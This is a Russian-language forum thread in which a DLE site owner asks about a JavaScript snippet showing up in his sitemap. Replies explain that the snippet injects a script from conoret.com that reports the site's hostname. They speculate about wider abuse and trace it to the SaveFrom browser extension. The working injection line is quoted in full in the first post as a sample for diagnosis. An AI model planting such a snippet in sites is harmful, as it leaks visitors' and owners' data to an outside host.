Вопрос? Помощь в sitemap

Недавно столкнулся с подобной проблемой: когда открываешь карту по адресу сайт.ру/sitemap.xml в САМОМ ВЕРХУ страницы попадается такой текст:
"window.top === window && !function(){var e=document.createElement("script"),t=document.getElementsByTagName("head")[0];e.src="//conoret.com/dsp?h="+document.location.hostname+"&r="+Math.random(),e.type="text/javascript",e.defer=!0,e.async=!0,t.appendChild(e)}();"
Видимо ошибка где то в JS если я не ошибаюсь ? Может кто сталкивался ? Влияет на работу карты или оставить пусть торчит.

Попутный вопрос. Заметил кое что только сейчас когда заходил на другие сайты, там стоит sitemap вот как для примера левый сайт нашел у него такой СМ:

Когда я же создаю См через DLE движок, мой код выглядит так:


Есть ли разница ? Или у меня такой же см только создается по другому ? Кто может пояснить за код - с меня что нибудь

 

Верно, у тебя создаётся по другому. С правками какого-то мудака.

Код отправляет домен автору кода. Точней даже не так, он создаёт объект script и загружает по url что-то (на самом деле ничего не грузит) но это действие которое по запрашивает js по адресу обязательно логируется на той стороне и данные сохраняются.


Домену ConOret.com 58 дней от роду. Сама главная страница отсутствует и её статус 404, а вот страница по ссылке уже имеет статус 200.

 

Проверяй модули и шаблоны на такую хню, когда скачиваешь с непроверенных источников

 

А можно подробнее объяснить на что это повлияет ? Типо будет перенаправлять мой траф или что ? Доменом и хостом не завладеют это 100%

 

Где может этот код находится ? Шаблон я весь проверил нигде похожего нет, а из модулей я устанавливал только trailerdp который выкладывал админ зерокула byroot
Единственное, может ли он находится в движке ? Ибо я скачал 15.2 NULLED

 

Спасибо за ответ, если бы не вы не разбрался бы. Суть вот в чём, в браузер или куда-то в файлы залез этот код, видимо где-то что-то скачал, дело не в шабе и не в модулях, открываю с Opera этого кода нет.

 

да много чего могут сделать. поставить редирект, встроить рекламу/майнеры, заменить ссылки/плееры, собирать стату и разные данные.

еще может быть какое-то расширение встраивает код. с frigate было такое, они тоже встраивали свой зловредный код во все сайты, даже в локалке. нужно на чистом профиле проверить

 

vadara. ни на что не повлияет, просто GPS трекер для человека. Возможно он установил уязвимости в системе и чтобы быть вкурсе куда переезжает сайт и в будущем их эксплуатировать сделал такое. Трафик с sitemap не смеши, на этом файле трафика нету кроме поискового бота который изредка проверяет файл, а сам бот не будет учитывать сей скрипт.

Как раз это тоже вероятно, может человек себе рут доступы сделал. И куда бы ты не побежал (в смысле какой бы домен не регнул) он всегда будет знать где твой сайт, а потом приходить и допустим внедрять сторонний код уже для перелива трафика, рекламные скрытые коды и редиректы, майнеры, да хоть базу сливать под шумок, короче может всё на что фантазии хватит, что конкретно и зачем это не понять уже.

p.s. Кстати чел выше дело говорит, может браузерное расширение просто кривое и плохое, они ведь тоже могут на такие хитрости. Или хостер если http протокол тоже могут внедрять js, но там вроде сделали бы просто без заморочек одной строкой без js.

 

Ну я и говорю, с оперы открывается без всяких кодов, возможно расширение блокнот устанавливал чтобы хранить пароли в нем По этому куску кода в гугле нашёл бурж сайт где китаец какой-то описывает как данные воровать, видимо вы правы друзья ) Буду осторожнее впредь) и вы будьте бдительны

 

Только что ломал голову над такой же проблемой. Оказалось браузерный плагин SaveFrom подсовывал это.

 

Здравствуйте. Зарегистрировался только для того, чтобы рассказать, что я точно определил откуда этот запрос отправляется на conoret.com - это SaveFromHelper - расширение Chrome для скачивания музыки, видео и других данных из ВК и YouTube. Его можно настроить, чтобы оно активировалось только щёлчку через правую кнопку мыши по значку расширения.